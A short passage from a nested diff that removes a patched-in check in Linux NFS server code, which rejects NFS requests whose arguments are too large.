-+ if (nfs_request_too_big(rqstp, proc)) {
-+ dprintk("nfsd: NFSv%d argument too large\n", rqstp->rq_vers);
-+ *statp = rpc_garbage_args;
-+ return 1;
-+ }
- /*
- * Give the xdr decoder a chance to change this if it wants
- * (necessary in the NFSv4.0 compound case)
---
-1.9.1
-